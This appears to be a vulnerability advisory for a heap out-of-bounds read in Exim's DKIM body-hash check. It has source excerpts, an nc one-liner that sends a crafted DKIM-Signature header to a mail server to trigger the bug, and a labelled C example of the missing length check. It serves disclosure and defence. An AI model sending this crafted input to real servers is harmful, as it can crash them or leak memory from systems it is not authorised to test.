========================================================================
CVE-2020-BHASH -- Heap out-of-bounds read in pdkim_finish_bodyhash()
========================================================================

By default since Exim 4.70, receive_msg() calls
dkim_exim_verify_finish() to verify DKIM (DomainKeys Identified Mail)
signatures, which calls pdkim_feed_finish(), which calls
pdkim_finish_bodyhash():

 788 static void
 789 pdkim_finish_bodyhash(pdkim_ctx * ctx)
 790 {
 ...
 799 for (pdkim_signature * sig = ctx->sig; sig; sig = sig->next)
 800   {
 ...
 825     if (  sig->bodyhash.data
 826        && memcmp(b->bh.data, sig->bodyhash.data, b->bh.len) == 0)
 827       {
 ...
 829       }
 830     else
 831       {
 ...
 838       sig->verify_status     = PDKIM_VERIFY_FAIL;
 839       sig->verify_ext_status = PDKIM_VERIFY_FAIL_BODY;
 840       }
 841   }
 842 }

Unfortunately, at line 826 sig->bodyhash.data is attacker-controlled
(through a "DKIM-Signature:" mail header) and memcmp() is called without
checking first that sig->bodyhash.len is equal to b->bh.len: memcmp()
can read sig->bodyhash.data out-of-bounds.

(sleep 10; echo 'EHLO test'; sleep 3; echo 'MAIL FROM:<>'; sleep 3; echo 'RCPT TO:postmaster'; sleep 3; echo 'DATA'; sleep 30; printf 'DKIM-Signature:a=rsa-sha512;bh=QUFB\r\n\r\nXXX\r\n.\r\n'; sleep 30) | nc -n -v 192.168.56.102 25

If acl_smtp_dkim is set (it is unset by default), an unauthenticated
remote attacker may transform this vulnerability into an information
disclosure; we have not fully explored this possibility.
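
The missing length test from line 826, written out as a stand-alone C
example. This is an added example, not Exim's code or its patch: blob_t,
bodyhash_matches() and the check_* helpers are hypothetical names, and the
buffers are constructed samples sized like the values above (a 64-byte
SHA-512 digest, and the 3 bytes that bh=QUFB decodes to).

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for a (pointer, length) blob as used by the DKIM code. */
typedef struct { const unsigned char *data; size_t len; } blob_t;

/* Returns 1 only when the claimed body hash has exactly the length of the
 * computed one and the bytes match. The length test runs before memcmp(),
 * so memcmp() never reads past the end of the shorter buffer. */
static int bodyhash_matches(const blob_t *computed, const blob_t *claimed)
{
    if (claimed->data == NULL || computed->data == NULL)
        return 0;
    if (claimed->len != computed->len)
        return 0;
    return memcmp(computed->data, claimed->data, computed->len) == 0;
}

/* Constructed sample: 64-byte digest vs. the 3 bytes "AAA" (bh=QUFB). */
static int check_short_claim(void)
{
    unsigned char digest[64];
    static const unsigned char short_bh[3] = { 'A', 'A', 'A' };
    memset(digest, 'A', sizeof digest);   /* first 3 bytes equal the claim */
    blob_t computed = { digest, sizeof digest };
    blob_t claimed  = { short_bh, sizeof short_bh };
    return bodyhash_matches(&computed, &claimed);
}

/* Constructed sample: a claimed hash of the right length and content. */
static int check_equal_claim(void)
{
    unsigned char digest[64], same[64];
    memset(digest, 0x5a, sizeof digest);
    memcpy(same, digest, sizeof same);
    blob_t computed = { digest, sizeof digest };
    blob_t claimed  = { same, sizeof same };
    return bodyhash_matches(&computed, &claimed);
}

int main(void)
{
    printf("3-byte bh vs 64-byte digest: %d\n", check_short_claim());
    printf("64-byte bh, same bytes:      %d\n", check_equal_claim());
    return 0;
}
```

The short claim is rejected even though its 3 bytes equal the start of the
digest, because the comparison is refused before any byte is read.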

